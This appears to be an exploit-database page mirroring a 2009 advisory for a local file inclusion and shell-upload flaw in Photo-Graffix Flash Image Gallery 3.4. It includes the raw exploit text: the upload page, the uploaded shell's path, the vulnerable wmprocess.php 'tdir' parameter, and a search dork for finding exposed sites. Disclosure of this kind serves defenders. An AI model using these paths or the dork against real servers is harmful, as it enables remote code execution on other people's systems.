header-logo
Suggest Exploit
vendor:
Photo-Graffix Flash Image Gallery
by:
ahmadbady
9.3
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: Photo-Graffix Flash Image Gallery
Affected Version From: 3.4
Affected Version To: 3.4
Patch Exists: NO
Related CWE: N/A
CPE: a:photo-graffix:photo-graffix_flash_image_gallery
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

shell upload/local file

Photo-GraffixV3.4.zip is vulnerable to Local File Inclusion vulnerability. An attacker can exploit this vulnerability by uploading a malicious shell file to the vulnerable web application and then accessing the file via the vulnerable wmprocess.php script. This will allow the attacker to execute arbitrary code on the server.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in file operations.
Source

Exploit-DB raw data:

  =-=-shell upload/local file-=-=

-=-=-=-=-=-=-=-=-=-=
script::Photo-GraffixV3.4.zip

Author: ahmadbady

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
download from:http://www.photo-graffix.com/V3/Photo-GraffixV3.4.zip

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
upload:
/path/mp3upload.htm ===> shell upload

shell = /path/music/shell.php
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
xpl:
/path/wmprocess.php?tdir=[open local file]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
dork: "powered by Photo-Graffix Flash Image Gallery"
  "powered by Photo-Graffix"
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2009-04-08]

Navigation

Suggest Exploit

Services By CQR